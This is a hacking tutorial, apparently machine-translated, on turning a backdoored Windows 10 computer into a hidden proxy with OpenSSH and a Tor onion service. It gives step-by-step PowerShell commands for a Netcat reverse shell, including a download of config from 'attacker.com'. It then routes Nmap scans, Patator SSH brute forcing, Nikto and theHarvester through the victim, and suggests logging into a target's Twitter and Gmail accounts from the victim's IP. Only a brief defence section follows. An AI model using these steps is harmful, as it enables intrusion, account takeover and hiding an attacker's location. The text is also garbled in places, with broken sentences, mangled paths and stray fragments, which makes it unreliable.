A privileged-access hacker on a Windows 10-based computer can configure it to act as a web proxy, allowing the attacker to attack devices and services on the network via the infected computer. The tests and attacks appear to come from the Windows 10 computer, making it difficult to determine the actual location of the attacker.
The attack works with an OpenSSH server and Tor. Newer versions of Windows 10 may already have an SSH server running that will allow attackers to more easily abuse the service.
While Tor is used in my example, other tools like ngrok and Serveo may possibly act as substitutes. However, these services have not been tested, mainly because Tor connections are encrypted and private, which makes the transmission of sensitive information more secure.
Why would someone do this to my computer?
It's unbelievable what a black guy This can happen to a Windows 1
In home networks, hackers can use the computer as a web proxy for fraudulent credit card transactions, denial-of-service attacks, or pirated content. The illegal activity appears to come from your Windows 10 device and poses a major legal threat.
The facility offers benefits for White Hat Penetration Testers. For example, it is usually difficult to use tools such as Nikto, Nmap, Patator, Curl, and TheHarvester directly from the affected device. With a proxy, these tools can be used via the Windows 10 device, which provides many opportunities to switch to other devices without connecting to the destination network.
Attack Scenario Requirements
You will need some things for this particular method.
- Remote Access : This article assumes that some level of remote access (ie, back door) has been established. Remote access can be achieved with MouseJack keyboard input, USB Rubber Ducky payload, physical backdoor devices, USB dead-drop attacks, and other social engineering methods.
- Administrator privileges : When OpenSSH is not installed Administrator rights (ie root privileges) are required to install and set up the Windows 10 target operating system. This requirement is largely conditional because some recent versions of Windows 10 already have SSH servers installed and running.
- Account password : The user's account password is required to log in to the SSH server after setup. If the shell were acquired with elevated privileges without knowing the user's password, password hashes could be secured and used forcibly off-line. Alternatively, it may be possible to remotely create a new user. You may also be able to configure the OpenSSH server to allow logins without a password. However, both methods are untested and beyond the scope of this article. Currently, the password is required for the already vulnerable Windows 10 account.
In this guide, code blocks beginning with > indicate that the command should be run with PowerShell on the Windows 10 system (that is, the Netcat backdoor ). Code blocks beginning with ~ $ indicate execution of the Kali Linux command.
Is OpenSSH already installed and running?
This attack requires the installation of an SSH server. The SSH server differs from the SSH client used in most versions of Windows 10. If OpenSSH is already installed, most of the following attacks can be performed without root privileges. However, if OpenSSH is not installed, administrator rights are required to install it.
Below are some commands that can be used to determine if OpenSSH is already installed and running in the background.
First, check if the OpenSSH directory exists. If no directory exists, SSH is probably not installed.
> ls "C: Program Files OpenSSH "
You can use the Get-NetTCPConnection command to quickly determine which services are ready to receive status and the number of ports you have numbered. We can see ports 22 the default ssh port is on this computer in receive state.
> Get-NetTCPConnection -State Lists LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting ------------ --------- ------------- ---------- ----- - ------------- :: 49676 :: 0 Listen :: 7680 :: 0 Listen :: 445 :: 0 Listen :: 135 :: 0 Listen :: 22 :: 0 Listen 0.0.0.0 49676 0.0.0.0 0 Listen 0.0.0.0 5040 0.0.0.0 0 Listen 0.0.0.0 135 0.0.0.0 0 Listen 0.0.0.0 22 0.0.0.0 0 Lists
The default port number for a particular service can be changed to any value. So the output is not 100% final.
With netstat the service using a specific port can be identified. However, the output of netstat commands took much longer than that of Get-NetTCPConnection. In some cases, it took a few minutes for netstat to finish before delivering the output to the potash system. Some advanced Get-NetTCPConnection commands can be used to indicate which services use ports. However, this seemed to be an excellent opportunity to display both options.
> netstat -ba Active connections Proto Local Address Foreign Address State TCP 0.0.0.0:22 DESKTOP-U4E0WK3: 0 LISTENING [sshd.exe] TCP 0.0.0.0:135 DESKTOP-U4E0WK3: 0 LISTENING RpcSs [svchost.exe] TCP 0.0.0.0:445 DESKTOP-U4E0WK3: 0 LISTENING Ownership information can not be retrieved TCP 0.0.0.0:5040 DESKTOP-U4E0WK3: 0 LISTENING CDPSvc [svchost.exe] TCP 0.0.0.0:7680 DESKTOP-U4E0WK3: 0 LISTENING DoSvc [svchost.exe]
In the above edition we can clearly see that sshd.exe occupies the harbor 22 .
Finally, Get-Process is used to indicate processes running in the background. The processes are sorted alphabetically. Scroll to section S and find the process name sshd .
> Get-Process Processes NPM (K) PM (K) WS (K) CPU (s) ID SI Process Name ------- ------ ----- ----- ------ - - ----------- 297 19 6760 24328 0.27 6104 1 ApplicationFrameHost 397 23 18056 50384 3.94 3784 0 aswEngSrv 701 24 19592 38364 12.05 3104 0 aswidsagent 4115 83 69404 40016 24.70 2336 0 AvastSvc 1888 44 22444 35008 4.30 1876 1 AvastUI ... 430 25 5924 15460 0.25 2628 0 spoolsv 98 11 1728 6664 0.05 7388 0 sshd 252 10 2524 7904 0,48 488 0 svchost 156 9 1852 7860 0.13 520 0 svchost 79 5 1040 3912 0.03 908 0 svchost
If SSH is not found on the target system, an increased backdoor (administrator) is required to execute many of the following commands. If SSH is already running, go to step 2.
Step 1: Setting Up SSH on the Windows 10 Target Computer
All of the following commands were executed through a reverse shell. This can be set up with Netcat listeners. The compromise of a Windows 10 system to this extent has been addressed in the following articles:
In my tests, before Invoke-WebRequest ( iwr ) to download OpenSSH binaries, the SecurityProtocol had to be defined as follows become command.
> [Net.ServicePointManager] :: SecurityProtocol = [Net.SecurityProtocolType] :: Tls12
Download the file OpenSSH-Win64.zip from GitHub. At the time of writing, v184.108.40.206p1 beta is the latest stable release. This download can take a minute or two, depending on the network speed of the Windows 10 system. During this time, the Netcat terminal will not respond or display a progress bar. Be patient here.
> iwr https://github.com/PowerShell/Win32-OpenSSH/releases/download/v220.127.116.11p1-Beta/OpenSSH-Win64.zip -o $ env: temp OpenSSH-Win64 .zip . 2 Extracting the OpenSSH Archive
PowerShell versions larger than 5.1 have a convenient decompression feature called Expand-Archive that allows the ffmpeg.zip file to be quickly unpacked into the destination's temporary directory.
> Expand Archive Path "$ env: temp OpenSSH-Win64.zip" -DestinationPath & # 39; C: Program Files OpenSSH & # 39; -Force
Expand Archive inherits the input file ( $ env: temp OpenSSH- Win64.zip ) and unpack it into ( -DestinationPath ) a new folder named C: Program Files OpenSSH .
Install the SSH server using the provided install-sshd.ps1 script. If no errors occur after a few seconds, the terminal reports a successful installation. An error was reported in a test ("NoServiceFoundForGivenName"), but it did not seem to cause the installation to fail.
> & "C: Program Files OpenSSH OpenSSH-Win64 install-sshd.ps1" [SC] SetServiceObjectSecurity SUCCESS [SC] ChangeServiceConfig2 SUCCESS [SC] ChangeServiceConfig2 SUCCESS The sshd and ssh-agent services were successfully installed
After the installation, the SSH server does not start automatically. It also does not start automatically when the system is restarted. The following command net is required to start the SSH server.
> net start sshd The OpenSSH SSH Server service starts. The OpenSSH SSH Server service started successfully.
Use Get-NetTCPConnection or Get-Process to verify that the SSH Server is running. Note the receive status of port 22.
> Get-NetTCPConnection -State Listen LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting ------------ --------- ------------- ---------- ----- - ------------- :: 49676 :: 0 Listen :: 7680 :: 0 Listen :: 445 :: 0 Listen :: 135 :: 0 Listen :: 22 :: 0 Listen 0.0.0.0 49676 0.0.0.0 0 Listen 0.0.0.0 5040 0.0.0.0 0 Listen 0.0.0.0 135 0.0.0.0 0 Listen 0.0.0.0 22 0.0.0.0 0 Lists
Step 2: Setting up Tor on the Windows 10 target computer
Tor can be installed if the OpenSSH server is running.
First, download the ZIP file containing precompiled Tor binaries and DLLs. Currently the version tor-win32-0.3.5.8.zip is the latest stable version. In the future, it may be desirable to search for newer versions on the Tor project website. Use the "Windows Expert Bundle" URL, not the tar.gz source file.
> iwr # https: //www.torproject.org/dist/torbrowser/8.0.9/tor-win32-0.3. 5.8.zip & # 39; -o $ env: temp tor.zip
2. Extracting Tor archive
With Expand archives, the ZIP file can be decompressed again into the temporary directory ( -DestinationPath ).
> Expand-Archive -Path $ env: TEMP tor.zip -DestinationPath $ env: TEMP tor
Then change ( cd ) to the new directory tor .
> cd $ env: TEMP tor Tor
Use the ls command to list the contents of the directory.
> ls Directory: C: Users USERNAME AppData Local Temp Tor Tor Mode LastWriteTime Length Name ---- ------------- ---------- -a ---- 21.02.2013 15:31 2585371 libeay32.dll -a ---- 21.02.2013 15:31 860748 libevent-2-1-6.dll -a ---- 21.02.2013 15:31 clock 601445 libevent_core-2-1-6.dll -a ---- 21.02.2013 15:31 562811 libevent_extra-2-1-6.dll -a ---- 21.02.2013 15:31 991228 libgcc_s_sjlj-1.dll -a ---- 21.02.2013 15:31 278533 libssp-0.dll -a ---- 21.02.2013 15:31 511930 libwinpthread-1.dll -a ---- 21.02.2013 15:31 788352 ssleay32.dll -a ---- 21.02.2013 15:31 1007104 tor-gencert.exe -a ---- 2/21/2019 3:31 PM 3794944 tor.exe -a ---- 21.02.2013 15:31 107520 zlib1.dll
3. Create Torrc Configuration File
Note that there is no " torrc" file in the output of ls . Torrc is the configuration file with instructions on how Tor should behave. In this case we would like Tor to create a new onionservice address. Anyone who has previously set up a Tor Onion service retrieves the configuration of HiddenServiceDir and HiddenServicePort in the torrc file. These values are responsible for the directory where Tor stores information about the onion service and the port used by the onion service.
There were some annoying word wrapping errors in my tests when the torrc file was created with ] echo and other PowerShell cmdlets for creating files. Finally, it was easier to host the desired torrc file on a remote server and simply download it with PowerShell.
First, verify the username of the target by using the $ env variable in PowerShell. This username is required for the following Torrc configuration file.
> echo $ env: username tokyoneon
Now create a file named "torrc" in Kali or a virtual private server and save the torrc configuration below to the file. Alternatively, this file can be hosted on a file-sharing server or on GitHub.
HiddenServiceDir C: Users USERNMAE AppData Local Temp Tor Tor HS HiddenServicePort 22 127.0.0.1:22[19659037<4Torrcdownloadingfromthegrabbersystem
To download the torrc file, set up a simple Python3 web server to make the file accessible to all users on the network and the Internet.
~ $ python3 -m http.server 80
In Windows 10, the Invoke-WebRequest command can be reused to download the Torrc configuration file from the attacker's system.
> iwr attacker.com/torrc -o torrc
Now use ls to verify that the torrc file was saved correctly.
> ls Directory: C: Users tokyoneon AppData Local Temp tor Tor Mode LastWriteTime Length Name ---- ------------- ---------- -a ---- 21.02.2013 15:31 2585371 libeay32.dll -a ---- 21.02.2013 15:31 860748 libevent-2-1-6.dll -a ---- 21.02.2013 15:31 clock 601445 libevent_core-2-1-6.dll -a ---- 21.02.2013 15:31 562811 libevent_extra-2-1-6.dll -a ---- 21.02.2013 15:31 991228 libgcc_s_sjlj-1.dll -a ---- 21.02.2013 15:31 278533 libssp-0.dll -a ---- 21.02.2013 15:31 511930 libwinpthread-1.dll -a ---- 21.02.2013 15:31 788352 ssleay32.dll -a ---- 21.02.2013 15:31 1007104 tor-gencert.exe -a ---- 2/21/2019 3:31 PM 3794944 tor.exe -a ---- 5/7/2019 9:03 PM 99 Torrc -a ---- 2/21/2019 3:31 PM 107520 zlib1.dll
Then cat to read the file contents.
> cat torrc HiddenServiceDir C: Users tokyoneon AppData Local Temp gate Gate HS HiddenServicePort 22 127.0.0.1:22[19659037<19459043<5StarttheTorprocess Finally, start tor.exe with the following command. After running the command, wait for the Netcat terminal to display "Bootstrapped 100%: Done". This indicates that it started correctly. Press Enter on the keyboard to return to an interactive Netcat shell.
> Start-Process -NoNewWindow -FilePath. Tor.exe argumentList & # 39 ;, & # 39; torrc & # 39; PS C: Users tokyoneon AppData Local Temp Gate Gate> May 8, 10: 43: 43,090 [notice] Gate 0.3.5.8 (git-5030edfb534245ed) on Windows 8 [or later] with Libevent 2.1.8 stable, OpenSSL 1.0.2q, Zlib 1.2.11, Liblzma N / A and Libzstd N / A. May 8, 10: 43: 43.152 [notice] Tor can not help you if you use it wrong! For security information, see https://www.torproject.org/download/download#warning May 08, 10: 43: 43.699 [notice] Read configuration file "C: Users tokyoneon AppData Local Temp tor Tor torrc". May 8, 10: 43: 43.715 [warn] The path for GeoIPFile (
) is relative and is resolved into C: Users tokyoneon AppData Local Temp tor Tor . Did you want that? May 08, 10: 43: 43.715 [warn] The path for GeoIPv6File ( ) is relative and is resolved into C: Users tokyoneon AppData Local Temp tor Tor . Did you want that? May 08 10: 43: 43.762 [notice] Socks Listener opens at 127.0.0.1:9050 May 08 10: 43: 43.762 [notice] Opened Socks Listener at 127.0.0.1:9050 May 08 10: 43: 43.000 [notice] Bootstrapped 0%: Start May 8, 10: 43: 43,000 [notice] Starting with the guard context "default" May 08 10: 43: 45.000 [notice] Bootstrapped 5%: Connection to the directory server is established May 08 10: 43: 45.000 [notice] Bootstrapped 10%: Stop the handshake with the directory server May 08 10: 43: 48,000 [notice] Bootstrapped 15%: An encrypted directory connection is established May 08 10: 43: 49,000 [notice] Bootstrapped 20%: Request for Network Status Consensus May 08 10: 43: 50.000 [notice] Bootstrapped 25%: Network state consensus is loading May 8, 10: 43: 56.000 [notice] I've learned more directory information, but not enough to build a circuit: we have no viable consensus. May 08, 10: 43: 57,000 [notice] Bootstrapped 40%: Loading Authority Key Certificates May 8, 10: 44: 00,000 [notice] The current consensus has no parent nodes. Tor can only create internal paths, eg. B. Paths to onion services. May 08 10: 44: 00.000 [notice] Bootstrapped 45%: Query Relay Descriptors for Internal Paths May 8, 10: 44: 00.000 [notice] I have learned more directory information, but not enough to build a circuit: we need more microdescriptors: we have 0/6680 and can only build 0% of the probable paths. (We have 0% of guards in weight, 0% of midpoint in weight and 0% of final weight (no exits in consensus using center) = 0% of path weight.) May 08 10: 44: 04.000 [notice] I've learned more directory information, but not enough to build a circuit: we need more microdescriptors: we have 0/6680 and can only build 0% of the likely paths. (We have 0% of guards in weight, 0% of midpoint in weight and 0% of final weight (no exits in consensus using center) = 0% of path weight.) May 08 10: 44: 05.000 [notice] Bootstrapped 50%: Relay descriptors for internal paths are loading May 8, 10: 44: 06.000 [notice] The current consensus contains root nodes. Tor can build home and internal paths. May 08 10: 44: 13.000 [notice] Bootstrapped 56%: Relay descriptors are loading May 08 10: 44: 15.000 [notice] Bootstrapped 64%: Relay descriptors are loading May 08 10: 44: 16.000 [notice] Bootstrapped 70%: Relay descriptors are loading May 08 10: 44: 18.000 [notice] Bootstrapped 76%: Relay descriptors are loading May 08 10: 44: 18.000 [notice] Bootstrapped 80%: Connection to the Tor network May 08 10: 44: 19.000 [notice] Bootstrapped 85%: End handshake with first hop May 08 10: 44: 23.000 [notice] Bootstrapped 90%: Construction of a gate circuit May 08 10: 44: 28,000 [notice] Bootstrapped 100%: Done
After the start of Tor, a new directory called "HS" was created. This directory contains the hostname file with the onion address. Use cat to view the file contents.
> cat HS hostname w6ngcsz3qryotaq5imneza5edidxvmr6fbefe4lxl3wabjagxagxdaqd.onion
Step 3: Connecting to the OpenSSH Server via Tor
Back in Kali Linux, Tor must be installed on the Windows 10 computer  to interact with the new Onion service. Installing Tor in Kali Linux
Tor can be installed in Kali with the command apt-get install -y tor but it is better to install it from the Tor project repository. This installation was covered in a recent zero-byte article on hiding SSH services from Shodan. Be sure to refer to this for detailed installation instructions.
Before we start using proxy hacking tools on Windows 10, we need to make sure that the SSH server is reachable from the Kali system. The command torsocks should be included in the installation of the Tor package. If not, install it with the following command.
~ $ apt-get install torsocks Read package lists ... Done Create dependency tree Status information is read ... Done torsocks is already the latest version (2.3.0-2). 0 updated, 0 reinstalled, 0 removed and 0 not updated.
Then use torsocks with ssh to connect to the SSH server running on the Windows 10 target device.
~ $ torsocks ssh -v -p22 email@example.com
It may take up to 60 seconds for a connection to be made several times. This slowness is common in new onion services and the coupling of SSH with Tor. When the SSH connection is made, that's great. Everything works as expected. Type exit or press ctrl + d to end the SSH session.
. 3 Enable proxy option
Open a new terminal and use the following command to create a SOCKS5 proxy port at 1337. This port number is arbitrary and can be changed to less than 65535.
~ $ torsocks ssh-D1337-C-p22 firstname.lastname@example.org Microsoft Windows [Version 10.0.17134.706] (c) 2018 Microsoft Corporation. All rights reserved. tokyoneon @ DESKTOP-U4E0WK3 C: Users tokyoneon>
This is a new SSH terminal. This is not meant to interact with. As long as this terminal is open, the proxy remains available. In Kali, verify that the proxy port was opened with the command ss to display the available listening ports. Note the 1337 port to 127.0.0.1 - this can be configured with Hacking Tools and Web Browsers for Proxy Requests via the hacked Windows 10 computer.
~ $ ss -tpl Status Recv-Q Send-Q Local Address: Port Peer Address: Port LISTS 0 128 127.0.0.1:1337 0.0.0.0:* User: (("ssh", pid = 5798, fd = 4))
Step 4: Configure the hacking tools to use the proxy
Many tools can be configured for use with this proxy. Proxychains is a good example. With proxy chains, it is possible to use many command-line tools as proxy over the SSH connection.
. 1 Install Proxy Chains
Make sure that proxy chains are installed in Kali Linux. This can be achieved with the following installation command.
~ $ apt-get install proxychains
By default, proxy chains are configured to anonymize proxy requests with Tor on port 9050. Therefore, the configuration file needs to be changed.
Use nano to open the proxychains.conf file. Change the very last line in the file from "socks4 127.0.0.1 9050" to "socks5 127.0.0.1 1337" and exit nano.
~ $ nano /etc/proxychains.conf[19659037[2Proxy-Nmap-Scans
Many users may attempt to perform Nmap scans from the Windows 10 computer once the SOCKS5 proxy has been created. Note that Nmap has limited support for built-in proxy features. Not all Nmap scan types are supported, even when coupled with proxy chains.
~ $ proxychains nmap -p80,22,21,443,8080,8443 -sS -T5 192.168.1.1/24 ProxyChains 3.1 (http://proxychains.sf.net) Start Nmap 7.70 (https://nmap.org) at 2019-05-08 19:25 UTC Nmap Scan report for 192.168.1.183 The host is active (0.00093s latency). PORT STATE SERVICE 21 / tcp filtered ftp 22 / tcp filtered ssh 80 / tcp filtered http 443 / tcp filtered https 8080 / tcp filtered http proxy MAC Address: 16: BE: 3F: F6: E1: 22 (Hewlett Packard) Nmap Scan report for 192.168.1.225 The host is active (0.0023s latency). PORT STATE SERVICE 21 / tcp closed ftp 22 / tcp open ssh 80 / tcp closed http 443 / tcp has https closed 8080 / tcp open http proxy MAC Address: 74: B3: 4C: D2: 33: A2 (Sony) Nmap Scan report for 192.168.1.1 The host is active (0.000044s latency). PORT STATE SERVICE 21 / tcp closed ftp 22 / tcp closed ssh 80 / tcp open http 443 / tcp has https closed 8080 / tcp closed http proxy Nmap finished: 256 IP addresses (3 hosts) scanned in 8.39 seconds
3. Proxy Curl Commands
Curl is a powerful command-line tool that can be used to create various types of Web requests, and supports many different protocols and functions. This can be useful for listing the types of web servers on devices on the network. Unlike many other tools, curl has built-in SOCKS5 support, which can be called with the option - Proxy .
~ $ curl --proxy socks5: //127.0.0.1: 1337 -I "http://192.168.1.225" HTTP / 1.0 200 OK Server: SimpleHTTP / 0.6 Python / 3.6.8 Date: Thu, 09 May 2019 21:34:29 GMT Content Type: Text / HTML; Character set = utf-8 Content Length: 1387
Curl with Proxychains also works as expected.
~ $ proxychains curl http://192.168.1.225:8080 ProxyChains 3.1 (http://proxychains.sf.net) | S chain | - <> - 127.0.0.1:1337-<>>>-192.168.1.225:8080-<><>- OK
Directory List for /
Directory List for /
On the server side, we see that the request came from the 192.168.1.183 IP address. This is the IP address of the Windows 10 device and not the Kali system on another network around the world.
HTTP Serving on 0.0.0.0 Port 8080 (http://0.0.0.0:8080/) ... 192.168.1.183 - - [09/May/201921:51:51] "HEAD / HTTP / 1.1" 200 - 192.168.1.183 - - [09/May/2019 21:51:58] "GET / HTTP / 1.1" 200 -
4. Proxy Patator Brute Force Attacks
Patator is a command line brute force tool. With proxy chains Patator can be used to force services through the Windows 10 computer. In the untested state, the same syntax can be used for other brute-forcing tools such as Hydra and Medusa.
~ $ proxychains patator ssh_login host = 192.168.1.225 port = 22 user = root password = FILE0 0 = / tmp /simple_wordlist.txt -t 1 ProxyChains 3.1 (http://proxychains.sf.net) INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2019-05-08 20:51 UTC INFO - INFO - Code Size Time | Candidate num | mesg INFO - ------------------------------------------------ ----------------------------- INFO - 1 22 5.921 | 123456 | 1 | Authentification failed. INFO - 1 22 5,496 | Abcdef123 | 2 | Authentification failed. INFO - 1 22 5.619 | a123456 | 3 | Authentification failed. INFO - 1 22 5.532 | little123 | 4 | Authentification failed. INFO - 1 22 5.640 | nanda334 | 5 | Authentification failed. INFO - 0 30 2.583 | tokyoneon | 6 | SSH 2.0 OpenSSH_7.9p1 Debian 5 INFO - 1 22 5.723 | abc12345 | 7 | Authentification failed. INFO - 1 22 5.501 | Password | 8 | Authentification failed. INFO - 1 22 5.567 | Pawerjon123 | 9 | Authentification failed.
The server side displays the failed password estimates returned from the Windows 10 IP address (192.168.1.183). This is further confirmation that attacks originating from the Kali system are properly routed through the Windows 10 computer.
sshd : Root password error of 192.168.1.183 port 50148 ssh2 sshd : Error: Maximum authentication attempt for root exceeded 192.168.1.183 port 50148 ssh2 [preauth] sshd : Trennen der Verbindung zum authentifizierenden Benutzer-Root-192.168.1.183-Port 50148: Zu viele Authentifizierungsfehler [preauth] sshd : PAM 5 weitere Authentifizierungsfehler; logname = uid = 0 euid = 0 tty = ssh ruser = rhost = 192.168.1.183 user = root sshd : PAM-Dienst (sshd) ignoriert maximale Wiederholungsversuche; 6> 3 sshd : pam_unix (sshd: auth): Authentifizierungsfehler; logname = uid = 0 euid = 0 tty = ssh ruser = rhost = 192.168.1.183 user = root sshd : Passwort für root von 192.168.1.183 Port 50149 ssh2 fehlgeschlagen sshd : Passwort für root von 192.168.1.183 Port 50149 ssh2 fehlgeschlagen sshd : Passwort für root von 192.168.1.183 Port 50149 ssh2 fehlgeschlagen sshd: Failed password for root from 192.168.1.183 port 50149 ssh2 sshd: Failed password for root from 192.168.1.183 port 50149 ssh2 sshd: Failed password for root from 192.168.1.183 port 50149 ssh2 sshd: error: maximum authentication attempts exceeded for root from 192.168.1.183 port 50149 ssh2 [preauth] sshd: Disconnecting authenticating user root 192.168.1.183 port 50149: Too many authentication failures [preauth] sshd: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183 user=root sshd: PAM service(sshd) ignoring max retries; 6 > 3 sshd: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.1.183 user=root sshd: Failed password for root from 192.168.1.183 port 50150 ssh2 sshd: Accepted password for root from 192.168.1.183 port 50150 ssh2
TheHarvester is an information gathering tool intended for penetration testers in the early stages of red team engagements. It features the ability to perform virtual host verification, DNS enumeration, reverse domain searches, and IP lookups, as well as make Shodan queries.
~$ proxychains theharvester -d nmap.org -l 200 -b bing,censys,yahoo ProxyChains-3.1 (http://proxychains.sf.net) ******************************************************************* * * * | |_| |__ ___ / /__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ / _ / /_/ / _` | '__ / / _ / __| __/ _ '__| * * | |_| | | | __/ / __ / (_| | | V / __/__ || __/ | * * __|_| |_|___| / /_/ __,_|_| _/ ___||___/_____|_| * * * * theHarvester Ver. 3.0.6 * * Coded by Christian Martorella * * Edge-Security Research * * email@example.com * ******************************************************************* found supported engines [-] Starting harvesting process for domain: nmap.org [-] Searching in Censys: [-] Searching in Bing: Searching 50 results... Searching 100 results... Searching 150 results... Searching 200 results... [-] Searching in Yahoo.. Searching 0 results... Searching 10 results... Searching 190 results... Searching 200 results... Harvesting results No IP addresses found [+] Emails found: ------------------ firstname.lastname@example.org email@example.com firstname.lastname@example.org [+] Hosts found in search engines: ------------------------------------ Total hosts: 6 [-] Resolving hostnames IPs... issues.nmap.org:18.104.22.168 research.nmap.org:22.214.171.124 scanme.nmap.org:126.96.36.199 svn.nmap.org:188.8.131.52 www.nmap.org:184.108.40.206
Nikto is a simple web server scanner that examines a website and reports discovered vulnerabilities that can later be used to compromise the site.
While Nikto has built-in support for HTTP proxies, it can't be used with this SOCKS5 proxy. I didn't test many of Nikto's options and arguments, but simple scans seemed to function properly. Readers are encouraged to experiment with this one before performing in a real scenario.
~$ proxychains nikto -host 192.168.1.225 -port 8080 -nossl ProxyChains-3.1 (http://proxychains.sf.net) - Nikto v2.1.6 --------------------------------------------------------------------------- |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK + Target IP: 192.168.1.225 + Target Hostname: 192.168.1.225 + Target Port: 8080 + Start Time: 2019-05-08 19:33:26 (GMT0) --------------------------------------------------------------------------- + Server: SimpleHTTP/0.6 Python/3.6.8 |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK |S-chain|-<>-127.0.0.1:1337-<><>-192.168.1.225:8080-<><>-OK
7. Proxy Web Requests with Firefox
With security-focused web services, it's possible to define blacklist and whitelist rules based on MAC and IP addresses. For example, this particular router will only allow the Windows 10 computer to access the router's gateway. Attempting to access 192.168.1.1 from any other devices on the network displays the following message.
Now, it would be possible to spoof Kali's MAC and IP address to trick the router into letting us view the gateway. But it's also possible to use the SSH proxy to achieve the same goal.
Open Firefox in Kali, and enter about:preferences into the URL bar. In "General," click on the "Settings" button.
Configure the proxy settings as shown below, then click "OK."
Now, navigating to 192.168.1.1 to access the router is allowed because the router believes the requests are coming from the whitelisted Windows 10 device.
This very same concept can be applied to websites like Twitter and Gmail, making it possible to access the target's accounts without raising too many red flags. These websites will see the origin (i.e., the IP address) of the login is identical to the IP address used by the Windows 10 computer.
It's important to note that this demonstrates only one way an attacker can use a compromised computer as a proxy. In earlier conceptions of this article, the target's router and Windows 10 firewall were modified to allow port-forwarding and remote access. This would also allow an attacker to access the SSH server from anywhere in the world.
Furthermore, admin privileges may not always be required. Tor, for example, can be downloaded and used without special permissions and can be configured to forward requests to any service or port on the network — without the use of SSH servers or SOCKS5 proxies.
These attacks were tested and performed on fully-patched Windows 10 systems using Avast and AVG antivirus software — so I can't recommend those as a solution. Readers will need to actively inspect running processes, search for shady software, and monitor traffic leaving their systems.
1. Inspect Outgoing Traffic with Wireshark
Wireshark is a great packet-capturing tool that can be used to observe packets leaving the network. If Tor is being used by an attacker, for example, the Tor server can be found on ExoneraTor. Similarly, Netcat traffic will be easily detected in Wireshark captures.
2. Create Strict Firewall Rules with pfSense
This solution isn't always entirely effective. Process names can be changed or spoofed, but a lazy hacker may leave these files name as the default (i.e., "tor.exe"), making them easier to detect on a compromised Windows 10 system. Below is an example of both an OpenSSH and Tor process running in the background, easily identified with the Windows 10 Task Manager.
Stay vigilant. Never underestimate you're worth to a hacker, and continue to find new ways of protecting yourself. Follow me on Twitter @tokyoneon_ if you enjoyed this article.
Don't Miss: Use Microsoft.com Domains to Bypass Firewalls